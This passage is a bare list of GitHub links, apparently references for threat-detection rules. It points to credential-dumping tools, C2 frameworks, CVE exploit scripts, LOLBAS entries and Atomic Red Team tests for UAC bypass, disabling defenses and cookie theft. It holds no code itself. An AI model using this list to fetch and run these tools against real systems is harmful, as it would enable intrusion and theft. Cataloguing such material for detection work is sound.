(Idea)\nhttps://github.com/Hackndo/lsassy\nhttps://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py\nhttps://github.com/Hackplayers/evil-winrm\nhttps://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb\nhttps://github.com/hacksysteam/HackSysExtremeVulnerableDriver\nhttps://github.com/hackvens/CoercedPotato\nhttps://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md\nhttps://github.com/harleyQu1nn/AggressorScripts\nhttps://github.com/HarmJ0y/DAMP\nhttps://github.com/HavocFramework/Havoc\nhttps://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py\nhttps://github.com/helpsystems/nanodump\nhttps://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507\nhttps://github.com/hfiref0x/UACME\nhttps://github.com/hhlxf/PrintNightmare\nhttps://github.com/hieuminhnv/CVE-2022-21587-POC\nhttps://github.com/HiwinCN/HTran\nhttps://github.com/hlldz/Invoke-Phant0m\nhttps://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1\nhttps://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py\nhttps://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py\nhttps://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md\nhttps://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\nhttps://github.com/huntresslabs/threat-intel/blob/3bad6b0fadfcca3ff5680923e74e39edd72f32da/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml\nhttps://github.com/huntresslabs/threat-intel/blob/main/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml\nhttps://github.com/HuskyHacks/ShadowSteal\nhttps://github.com/HyperSine/how-does-MobaXterm-encrypt-password\nhttps://github.com/iadgov/Event-Forwarding-Gu
idance/tree/master/Events\nhttps://github.com/iagox86/dnscat2\nhttps://github.com/Immersive-Labs-Sec/nimbuspwn\nhttps://github.com/j00sean/SecBugs/tree/ff72d553f75d93e1a0652830c0f74a71b3f19c46/CVEs/CVE-2023-27363\nhttps://github.com/joaoviictorti/RustRedOps/tree/ce04369a246006d399e8c61d9fe0e6b34f988a49/Self_Deletion\nhttps://github.com/JoelGMSec/PSAsyncShell\nhttps://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951\nhttps://github.com/jpillora/chisel/\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\nhttps://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md\nhttps://github.com/JumpsecLabs/TokenSmith\nhttps://github.com/kagancapar/CVE-2022-29072\nhttps://github.com/kavika13/RemCom\nhttps://github.com/kavika13/RemCom/\nhttps://github.com/Kevin-Robertson/Inveigh\nhttps://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs\nhttps://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs\nhttps://github.com/Kevin-Robertson/Powermad\nhttps://github.com/keyboardcrunch/SentinelOne-ATTACK-Queri
es/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection\nhttps://github.com/kleiton0x00/RedditC2\nhttps://github.com/klinix5/InstallerFileTakeOver\nhttps://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf\nhttps://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet\nhttps://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md\nhttps://github.com/krmaxwell/dns-exfiltration\nhttps://github.com/LandGrey/CVE-2018-2894\nhttps://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92\nhttps://github.com/last-byte/PersistenceSniper\nhttps://github.com/lclevy/firepwd\nhttps://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md\nhttps://github.com/lijiejie/IIS_shortname_Scanner\nhttps://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680\nhttps://github.com/logangoins/SharpSuccessor\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Esentutl.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd3
6deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml\nhttps://github.com/LOLBAS-Project/LOLBAS/issues/243\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/147\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/151\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/180\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/211/files\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/238/files\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/239\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/239/files\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/264\nhttps://github.com/looCiprian/GC2-sheet\nhttps://github.com/ly4k/Certipy\nhttps://github.com/ly4k/SpoolFool\nhttps://github.com/M2Team/Privexec/\nhttps://github.com/Maka8ka/NGLite\nhttps://github.com/malcomvetter/CSExec\nhttps://github.com/mandiant/SharPersist\nhttps://github.com/matterpreter/DefenderCheck\nhttps://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt\nhttps://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH\nhttps://github.com/mdsecactivebreach/CACTUSTORCH\nhttps://github.com/med0x2e/vba2clr\nhttps://github.com/mgeeky/Stracciatella\nhttps://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.Common/Data/DPAPI/DPAPIBackupKey.cs#L28-L32\nhttps://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1\nhttps://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md\nhttps://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md\nhttps://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md\nhttps://gi
thub.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml\nhttps://github.com
/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf36
5fee2a9/atomics/T1115/T1115.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f605
7fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md\n
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task\nhttps://github.com/redc
anaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T
1546.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2
a9/atomics/T1547.006/T1547.006.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T15
53.004/T1553.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/ato
mics/T1562.001/T1562.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib\nhttps://github.com/redcanaryco/atomic-red-t